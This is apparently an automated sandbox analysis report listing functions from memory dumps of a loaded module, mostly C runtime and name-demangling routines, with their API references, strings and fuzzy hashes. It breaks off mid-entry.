0x6e1721f4
0x00000000
0x6e1721da
0x6e17224e
0x6e17224e
0x6e17224e
0x6e1721ca
0x6e17226a
0x6e172271

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 37e3cc2f4c908de3eb001f66801214e8ffbeda715c454b040a87fcc1d13b55a8
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 1F2106B29002059FDB20DFA8DC809A7BBB9FF48310B058468DC198B245D730FA56C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E23C073, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.728091085.000000006E23B000.00000040.00020000.sdmp, Offset: 6E23B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: ae309d070763c9e8a564ed6afb0f009acf08436716c5ec4563e00cdf41bad63a
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: F91193B73506259FD754CE99DC91E9273EAEB89730B298066ED04CF301D676E842CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E23C46C, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.728091085.000000006E23B000.00000040.00020000.sdmp, Offset: 6E23B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: ec88533a21102c322f54d069ed099f6bbe64088dd98e2aabc151b0d1b2eb447e
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: E90162B631413A8FD308CBADD985D79B7E5EBC2B20B24C07EC2428B61AD624E401CA30

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4CE0, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f80fc7e42718e1cef5d111f8ce74530db63551b4c154e3868bec9a6ed3356b
Instruction ID: c693d8dad9d5c26c82dcf62a4192db6ead7fa2d651ec8feae3618b6033ceddb2
Opcode Fuzzy Hash: 70f80fc7e42718e1cef5d111f8ce74530db63551b4c154e3868bec9a6ed3356b
Instruction Fuzzy Hash: 3E11E1B5E0060CEFDB00DFD4D845BADB7B5BB64304F2089A4E418AB785E770AB81DB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4D80, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69fcc8b4d0126b339ec610bae48dcfa7e315de9ca538aecc3168ddedb867dcae
Instruction ID: 7fc5e71a56fc350c31415fed96f453e9183cdeefd8aec0a005258c7aa8b77cc8
Opcode Fuzzy Hash: 69fcc8b4d0126b339ec610bae48dcfa7e315de9ca538aecc3168ddedb867dcae
Instruction Fuzzy Hash: EC118EB4D40208EFCB00DBE4D941BEDB7B5BB64304F2045A8E5196B785E774AA91DB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B7960, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a8b6ecc5db9c1efa434a6914d392de8420ecd16dd435381bf1fb007753cdda
Instruction ID: 67b8e0ee415fbde261626d6c0583e9f061841a820cbb2d885e42598dfef99612
Opcode Fuzzy Hash: a8a8b6ecc5db9c1efa434a6914d392de8420ecd16dd435381bf1fb007753cdda
Instruction Fuzzy Hash: 4EE0E52084D388AACF0296E580117EDBB794F93320F1402C6C482072C2C17B8989E3A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4E20, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b15bcadc8a72e62247d63694394c8d58c556b172c13d70b4330861a501b8be07
Instruction ID: c64bbb17622b9082117a546e910300f7ba901e6c9e7924728f68615ea34ac88f
Opcode Fuzzy Hash: b15bcadc8a72e62247d63694394c8d58c556b172c13d70b4330861a501b8be07
Instruction Fuzzy Hash: 3EE048B6910648ABCB04CBD4E441A9AB379E748214F244658F80947701D639EE51D691

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0FE0, Relevance: 86.1, APIs: 47, Strings: 2, Instructions: 399COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0FEC
Mailbox.LIBCMTD ref: 6E1B1044
DName::isEmpty.LIBCMTD ref: 6E1B1054
operator+.LIBVCRUNTIMED ref: 6E1B1081
Mailbox.LIBCMTD ref: 6E1B108D
operator+.LIBVCRUNTIMED ref: 6E1B10A7
Mailbox.LIBCMTD ref: 6E1B10B3
DName::operator+.LIBCMTD ref: 6E1B1169
Mailbox.LIBCMTD ref: 6E1B1172
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1B119B

Part of subcall function 6E1AE050: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1AE07B
Part of subcall function 6E1AE050: Mailbox.LIBCMTD ref: 6E1AE0C6

operator+.LIBVCRUNTIMED ref: 6E1B11AD

Part of subcall function 6E1A97C0: DName::operator+.LIBCMTD ref: 6E1A97E1

DName::operator+.LIBCMTD ref: 6E1B11C4

Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98B0
Part of subcall function 6E1A98A0: DName::operator+=.LIBCMTD ref: 6E1A98BD
Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98C9

Mailbox.LIBCMTD ref: 6E1B11E3
DName::operator+.LIBCMTD ref: 6E1B121E
Mailbox.LIBCMTD ref: 6E1B1227
DName::operator+.LIBCMTD ref: 6E1B1463
Mailbox.LIBCMTD ref: 6E1B146C
DName::operator+.LIBCMTD ref: 6E1B11DA

Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9870
Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9888

DName::isEmpty.LIBCMTD ref: 6E1B1492
DName::operator=.LIBVCRUNTIMED ref: 6E1B14A0
DName::DName.LIBVCRUNTIMED ref: 6E1B14C4
DName::operator+.LIBCMTD ref: 6E1B14DA
DName::operator+.LIBCMTD ref: 6E1B14F0
Mailbox.LIBCMTD ref: 6E1B14F9
DName::operator=.LIBVCRUNTIMED ref: 6E1B1507
Mailbox.LIBCMTD ref: 6E1B1513

Strings

@, xrefs: 6E1B1487
-, xrefs: 6E1B10F0

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Name::operator+$Nameoperator+$DecoratedDecorator::getEmptyName::isName::operator=$Iterator_baseIterator_base::_Name::Name::operator+=std::_
String ID: -$@
API String ID: 625857421-1222683799
Opcode ID: 707e5df2ceee7ea3b9bca3a4243ab1c54ae098afc7475ad02c92e3c5e9ee4e2a
Instruction ID: d0b6617e1de200881504a3b66f17af66abc125a1ce263c627c2bd5a1038e18ed
Opcode Fuzzy Hash: 707e5df2ceee7ea3b9bca3a4243ab1c54ae098afc7475ad02c92e3c5e9ee4e2a
Instruction Fuzzy Hash: 8EF18475D002089BDB04CFE4EDA0FFE77B9AF55304F108569E216AA180EB716AC8DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AF080, Relevance: 75.6, APIs: 42, Strings: 1, Instructions: 391COMMON

Download Yara Rule

APIs

operator+.LIBVCRUNTIMED ref: 6E1AF09F

Part of subcall function 6E1A97F0: DName::DName.LIBVCRUNTIMED ref: 6E1A97FD
Part of subcall function 6E1A97F0: DName::operator+.LIBCMTD ref: 6E1A9810

DName::DName.LIBVCRUNTIMED ref: 6E1AF0DD

Strings

), xrefs: 6E1AF10C

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: NameName::$Name::operator+operator+
String ID: )
API String ID: 308612335-2427484129
Opcode ID: 9d0f0d7096b379212abce378120d2f87f1a325e251c717cf0a36538330b28ba0
Instruction ID: 38de5fab5d89cb49b5966792ad770384b1c0dde294957f45d9a219e12328318a
Opcode Fuzzy Hash: 9d0f0d7096b379212abce378120d2f87f1a325e251c717cf0a36538330b28ba0
Instruction Fuzzy Hash: 3FE166B9D00108ABDB04DFE8EDA0AFE777DAF55304F208659E72597180EB31AAC4DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A71A0, Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 427COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7242
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7252
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A725D
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A72BA
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A72C5
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A72D0
_Smanip.LIBCPMTD ref: 6E1A7342

Part of subcall function 6E1BD290: IsProcessorFeaturePresent.KERNEL32(00000017,?,?,6E1DC799,?,?,6E1B5367,?), ref: 6E1BD2D2

Is_bad_exception_allowed.LIBVCRUNTIMED ref: 6E1A72F9

Part of subcall function 6E1A8360: type_info::operator==.LIBVCRUNTIMED ref: 6E1A839D

___DestructExceptionObject.LIBCMTD ref: 6E1A730E
std::bad_alloc::bad_alloc.LIBCMTD ref: 6E1A731C

Part of subcall function 6E1A5B50: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 6E1A5BEA

__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6E1A73CC
weak_ptr.LIBCPMTD ref: 6E1A7423
__FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 6E1A742F
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6E1A7439
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6E1A7445
CatchIt.LIBCMTD ref: 6E1A74F3

Strings

csm, xrefs: 6E1A734A
csm, xrefs: 6E1A7275
csm, xrefs: 6E1A71F4

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructFeatureHardwareIs_bad_exception_allowedMap::endObjectPresentProcessorRaiseSmanipstd::bad_alloc::bad_alloctype_info::operator==weak_ptr
String ID: csm$csm$csm
API String ID: 2369658663-393685449
Opcode ID: 278844731264d02cbf07a900c416ad94a082a9cc6b8cf4cc2e76c97842f2ade9
Instruction ID: f5c1b8ca4ca78d09febd6393c95dce325e8d81aa394a2420817d6b291b8623ca
Opcode Fuzzy Hash: 278844731264d02cbf07a900c416ad94a082a9cc6b8cf4cc2e76c97842f2ade9
Instruction Fuzzy Hash: 8FF160B9900209AFCB04CFEDD850AFE7779AF54304F10855AEA159B289DB30DAC5DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AF9C0, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AF9CC
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AF9D4
DName::DName.LIBVCRUNTIMED ref: 6E1AFA34
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AFA44
operator+.LIBVCRUNTIMED ref: 6E1AFA6E
DName::operator+=.LIBCMTD ref: 6E1AFA94
DName::operator+=.LIBCMTD ref: 6E1AFA9E
Mailbox.LIBCMTD ref: 6E1AFAC2
DName::DName.LIBVCRUNTIMED ref: 6E1AFC1D
DName::DName.LIBVCRUNTIMED ref: 6E1B02F5
DName::setIsUDC.LIBCMTD ref: 6E1B0308
DName::isEmpty.LIBCMTD ref: 6E1B0312
operator+.LIBVCRUNTIMED ref: 6E1B0348
Mailbox.LIBCMTD ref: 6E1B0354
Mailbox.LIBCMTD ref: 6E1B0360

Strings

_, xrefs: 6E1AFA07

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Iterator_baseIterator_base::_MailboxNameName::std::_$Name::operator+=operator+$EmptyName::isName::set
String ID: _
API String ID: 2065213285-701932520
Opcode ID: 8782a19ad13cd3f8b14014d3de551da5856167db2a91d482f62e0d61bead235e
Instruction ID: 7e7862d734cdf955840b87c6a74902c949fe26882aa9523f49765465c78087d4
Opcode Fuzzy Hash: 8782a19ad13cd3f8b14014d3de551da5856167db2a91d482f62e0d61bead235e
Instruction Fuzzy Hash: 72A1B374940208DFCF48DFE8D9A4AFD7BB9BF45304F008599E6059B290EB716AC5EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B04F0, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 276COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B04F9
operator+.LIBVCRUNTIMED ref: 6E1B052E
DName::isEmpty.LIBCMTD ref: 6E1B0541
Mailbox.LIBCMTD ref: 6E1B0595
DName::setPtrRef.LIBCMTD ref: 6E1B05AC
char_traits.LIBCPMTD ref: 6E1B05BA
operator+.LIBVCRUNTIMED ref: 6E1B0601

Strings

B, xrefs: 6E1B0509

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: operator+$EmptyIterator_baseIterator_base::_MailboxName::isName::setchar_traitsstd::_
String ID: B
API String ID: 1073764026-1255198513
Opcode ID: 67aa0c9e5a48e360b2b74ec5daf43ddba619f7875a0019d0e6fa32fe3691c0d6
Instruction ID: 9e6e967aa0adfa82ea4f13d8bd4d223f68c6808cf14f3ac373ca687b83ff4b30
Opcode Fuzzy Hash: 67aa0c9e5a48e360b2b74ec5daf43ddba619f7875a0019d0e6fa32fe3691c0d6
Instruction Fuzzy Hash: 62B140B5D44208EFCF04DFA8EA95AED77B9BB45304F048518FA095B291E771AAC0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3A40, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B3A9B
Mailbox.LIBCMTD ref: 6E1B3AC0
DName::operator=.LIBVCRUNTIMED ref: 6E1B3B18
und_strncmp.LIBCMTD ref: 6E1B3B55
DName::getString.LIBCMTD ref: 6E1B3C1D
Mailbox.LIBCMTD ref: 6E1B3C70

Part of subcall function 6E1A9700: DName::DName.LIBVCRUNTIMED ref: 6E1A9718

Replicator::isFull.LIBCMTD ref: 6E1B3D42
Replicator::operator+=.LIBCMTD ref: 6E1B3D55
Mailbox.LIBCMTD ref: 6E1B3D61

Strings

@, xrefs: 6E1B3AE0

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$FullIterator_baseIterator_base::_NameName::Name::getName::operator=Replicator::isReplicator::operator+=Stringstd::_und_strncmp
String ID: @
API String ID: 3194277874-2766056989
Opcode ID: 5bb2e4703a8f434570a3d6e16202f77ffd23e95e630247e21fca5f1db0721971
Instruction ID: dfb2ff889010247d1f5e83b86f747e1c0771c71a326ff1444d6b9c0c84f8cdc8
Opcode Fuzzy Hash: 5bb2e4703a8f434570a3d6e16202f77ffd23e95e630247e21fca5f1db0721971
Instruction Fuzzy Hash: 77A18275D002089FCF44CFE8DD94AEEBBF9BF49304F108569E505AB284DBB16985DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F5F20, Relevance: 34.8, APIs: 23, Instructions: 321timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E1F5FE3
__MarkAllocaS.LIBCMTD ref: 6E1F5FEC
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1F6007
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1F6012
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F6030

Part of subcall function 6E1E81B0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E1E81E3

std::_Mutex::_Lock.LIBCPMTD ref: 6E1F606D
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F60B0

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide__wcstombs_l
String ID:
API String ID: 3719586419-0
Opcode ID: 21aa63ffafdb4240c989a68521f000cf3443fd6029ddb117915d6ee14b9b0fa6
Instruction ID: ac765f11638508bcd6ff867d2b015945cfeaec191da4999250ea72de8436d911
Opcode Fuzzy Hash: 21aa63ffafdb4240c989a68521f000cf3443fd6029ddb117915d6ee14b9b0fa6
Instruction Fuzzy Hash: A1C1F9B191410DEBDB04DFD4DD91FDEB7B8AB58308F104558E515AB280EB70AE86EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC550, Relevance: 33.2, APIs: 22, Instructions: 210COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMTD ref: 6E1AC59A
DName::operator+.LIBCMTD ref: 6E1AC5AB
DName::isEmpty.LIBCMTD ref: 6E1AC718
operator+.LIBVCRUNTIMED ref: 6E1AC743
DName::operator+.LIBCMTD ref: 6E1AC75C
DName::operator+.LIBCMTD ref: 6E1AC770
DName::operator+.LIBCMTD ref: 6E1AC784

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::operator+$EmptyName::isoperator+
String ID:
API String ID: 2054230242-0
Opcode ID: 550124a08fe7e4d41584b5fd21b168b9e0419e6d1d63655fb7c27e519aec7711
Instruction ID: 19211e64aeb0a46d93dc5e8ef4d825db0860420e91b207c37f7ff1769d94d7d7
Opcode Fuzzy Hash: 550124a08fe7e4d41584b5fd21b168b9e0419e6d1d63655fb7c27e519aec7711
Instruction Fuzzy Hash: 10810DB9D00108AFDB04DFE8ECA0BFE77B9AF54304F508569E619AB180EB715AC4DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC8E0, Relevance: 30.3, APIs: 20, Instructions: 327COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AC927
Mailbox.LIBCMTD ref: 6E1ACDD4
DName::isEmpty.LIBCMTD ref: 6E1ACDDC
Mailbox.LIBCMTD ref: 6E1ACDEC
operator+.LIBVCRUNTIMED ref: 6E1ACE5B
Mailbox.LIBCMTD ref: 6E1ACE67
operator+.LIBVCRUNTIMED ref: 6E1ACE9E
Mailbox.LIBCMTD ref: 6E1ACEAA
operator+.LIBVCRUNTIMED ref: 6E1ACF05
Mailbox.LIBCMTD ref: 6E1ACF11
DName::isEmpty.LIBCMTD ref: 6E1ACF19
operator+.LIBVCRUNTIMED ref: 6E1ACF2F
Mailbox.LIBCMTD ref: 6E1ACF47
operator+.LIBVCRUNTIMED ref: 6E1AD0A6

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$operator+$EmptyName::is$Iterator_baseIterator_base::_std::_
String ID:
API String ID: 2623725463-0
Opcode ID: f2dee6bb2c080024a83daf459fd12ea735dbb179d8504ead497bd81f58e395d0
Instruction ID: cf93bef791f0562ee2e81b2f98342ec716b6691b6624b6bfd26cf2c10e592fb4
Opcode Fuzzy Hash: f2dee6bb2c080024a83daf459fd12ea735dbb179d8504ead497bd81f58e395d0
Instruction Fuzzy Hash: 4CD15EB9C00209ABCB15DFE8EC60AFDBBB8AF55304F04455AE6167A240EB3157C5DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AEBE0, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AEBE9
DName::DName.LIBVCRUNTIMED ref: 6E1AEC72
DName::DName.LIBVCRUNTIMED ref: 6E1AECED
DName::DName.LIBVCRUNTIMED ref: 6E1AED05
DName::DName.LIBVCRUNTIMED ref: 6E1AED6C

Part of subcall function 6E1A92D0: __aullrem.LIBCMT ref: 6E1A9317
Part of subcall function 6E1A92D0: __aulldiv.LIBCMT ref: 6E1A9330

DName::operator+.LIBCMTD ref: 6E1AED79

Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9870
Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9888

Mailbox.LIBCMTD ref: 6E1AED82
DName::operator+.LIBCMTD ref: 6E1AED90
Mailbox.LIBCMTD ref: 6E1AED99
DName::operator+.LIBCMTD ref: 6E1AEDC4

Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98B0
Part of subcall function 6E1A98A0: DName::operator+=.LIBCMTD ref: 6E1A98BD
Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98C9

Mailbox.LIBCMTD ref: 6E1AEDCD
DName::operator+=.LIBCMTD ref: 6E1AEDF5

Part of subcall function 6E1A9C00: DName::isValid.LIBCMTD ref: 6E1A9C0A
Part of subcall function 6E1A9C00: DName::isEmpty.LIBCMTD ref: 6E1A9C16
Part of subcall function 6E1A9C00: DName::operator=.LIBVCRUNTIMED ref: 6E1A9C32

DName::setIsComArray.LIBCMTD ref: 6E1AEDFD
Mailbox.LIBCMTD ref: 6E1AEE09
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AEE16

Strings

C, xrefs: 6E1AEC12

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$NameName::$Name::operator+$Iterator_baseIterator_base::_Name::isName::operator+=std::_$ArrayEmptyName::operator=Name::setValid__aulldiv__aullrem
String ID: C
API String ID: 961569035-1037565863
Opcode ID: 5acf4359a59f2edc5664a2261620d431841b93b89095a5d2e10e62a9cdb6af37
Instruction ID: bd0f1332b8db6f3fb8bec6d9285b927678961dc274011ec9b26056acbe51a61a
Opcode Fuzzy Hash: 5acf4359a59f2edc5664a2261620d431841b93b89095a5d2e10e62a9cdb6af37
Instruction Fuzzy Hash: A8619E38544245DFDF48CFA8DAA4BFE77B6BB52304F108559E6025B2D4CBB1AAC0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3840, Relevance: 25.7, APIs: 17, Instructions: 154COMMON

Download Yara Rule

APIs

Mailbox.LIBCMTD ref: 6E1B384D
DName::isValid.LIBCMTD ref: 6E1B3855
DName::operator+.LIBCMTD ref: 6E1B388B

Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98B0
Part of subcall function 6E1A98A0: DName::operator+=.LIBCMTD ref: 6E1A98BD
Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98C9

DName::operator+.LIBCMTD ref: 6E1B389E

Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9870
Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9888

Mailbox.LIBCMTD ref: 6E1B38A7
DName::isValid.LIBCMTD ref: 6E1B38AF

Part of subcall function 6E1A9990: DName::isValid.LIBCMTD ref: 6E1A999C
Part of subcall function 6E1A9990: DName::isEmpty.LIBCMTD ref: 6E1A99B1

DName::isValid.LIBCMTD ref: 6E1B38F2
operator+.LIBVCRUNTIMED ref: 6E1B3934

Part of subcall function 6E1A97C0: DName::operator+.LIBCMTD ref: 6E1A97E1

DName::operator+.LIBCMTD ref: 6E1B3948

Part of subcall function 6E1A9A30: DName::isValid.LIBCMTD ref: 6E1A9A3C
Part of subcall function 6E1A9A30: DName::isEmpty.LIBCMTD ref: 6E1A9A48
Part of subcall function 6E1A9A30: DName::isEmpty.LIBCMTD ref: 6E1A9A54
Part of subcall function 6E1A9A30: DName::operator=.LIBVCRUNTIMED ref: 6E1A9A69

DName::isValid.LIBCMTD ref: 6E1B3976
DName::isValid.LIBCMTD ref: 6E1B39B6
DName::operator+=.LIBCMTD ref: 6E1B39D1
DName::operator+=.LIBCMTD ref: 6E1B39DB

Part of subcall function 6E1B0FE0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0FEC
Part of subcall function 6E1B0FE0: Mailbox.LIBCMTD ref: 6E1B1044

DName::isValid.LIBCMTD ref: 6E1B3A00
operator+.LIBVCRUNTIMED ref: 6E1B3A13
Mailbox.LIBCMTD ref: 6E1B3A1F
Mailbox.LIBCMTD ref: 6E1B3A2B

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::is$Mailbox$Valid$Name::operator+$EmptyName::operator+=$operator+$Iterator_baseIterator_base::_Name::operator=std::_
String ID:
API String ID: 1123558639-0
Opcode ID: b69a99584c96666b5eed580c4d9a0fedee6d040b2210f11a19a78df6210a0f52
Instruction ID: c23df24459d10472a746662df6b9f5129eaf0e88a025121dc907b4bc9951c089
Opcode Fuzzy Hash: b69a99584c96666b5eed580c4d9a0fedee6d040b2210f11a19a78df6210a0f52
Instruction Fuzzy Hash: FC51F270D0014A9BDF04DFE4DAA59FE77BDAF11304F204169E603A6180EBB1AEC5DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE490, Relevance: 24.2, APIs: 16, Instructions: 187COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1AE4CE
operator+.LIBVCRUNTIMED ref: 6E1AE543

Part of subcall function 6E1A9790: DName::operator+.LIBCMTD ref: 6E1A97B0

DName::DName.LIBVCRUNTIMED ref: 6E1AE534

Part of subcall function 6E1A92D0: __aullrem.LIBCMT ref: 6E1A9317
Part of subcall function 6E1A92D0: __aulldiv.LIBCMT ref: 6E1A9330

DName::DName.LIBVCRUNTIMED ref: 6E1AE57C
Mailbox.LIBCMTD ref: 6E1AE591
DName::DName.LIBVCRUNTIMED ref: 6E1AE5FA
operator+.LIBVCRUNTIMED ref: 6E1AE609
DName::DName.LIBVCRUNTIMED ref: 6E1AE621
Mailbox.LIBCMTD ref: 6E1AE636

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: NameName::$Mailboxoperator+$Name::operator+__aulldiv__aullrem
String ID:
API String ID: 2030757049-0
Opcode ID: 764b4a46f4062e035f9669fbfe65f74379ddcfce958196c2b50791855c9978c1
Instruction ID: 52269ed1f39fc7b3cd02d3f9f4a0a62404f4673ec879cb519a8a50e1865ae97b
Opcode Fuzzy Hash: 764b4a46f4062e035f9669fbfe65f74379ddcfce958196c2b50791855c9978c1
Instruction Fuzzy Hash: 317142B4D04508AFCF04CFE9D5A09FEBBF9AF49304F108559E6159B250D731AA81DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1C50, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B1C5D
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B1CC3
Mailbox.LIBCMTD ref: 6E1B1CFE
Mailbox.LIBCMTD ref: 6E1B1E10
Mailbox.LIBCMTD ref: 6E1B1E27
Replicator::isFull.LIBCMTD ref: 6E1B1E40
Replicator::operator+=.LIBCMTD ref: 6E1B1E53
DName::isEmpty.LIBCMTD ref: 6E1B1E5B
DName::operator+=.LIBCMTD ref: 6E1B1E71
DName::isValid.LIBCMTD ref: 6E1B1EB0
DName::DName.LIBVCRUNTIMED ref: 6E1B1EBE
Mailbox.LIBCMTD ref: 6E1B1EDB

Strings

6, xrefs: 6E1B1D4F

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Iterator_baseIterator_base::_Name::isstd::_$EmptyFullNameName::Name::operator+=Replicator::isReplicator::operator+=Valid
String ID: 6
API String ID: 2413373717-498629140
Opcode ID: 46baf94f3c1451638f40d6a882f26b556337f8de84ec26c537f4bcefb158be94
Instruction ID: b99a3c5283fded43987160f2bbb39519f80f67c197164c23b17e77d69c3b1964
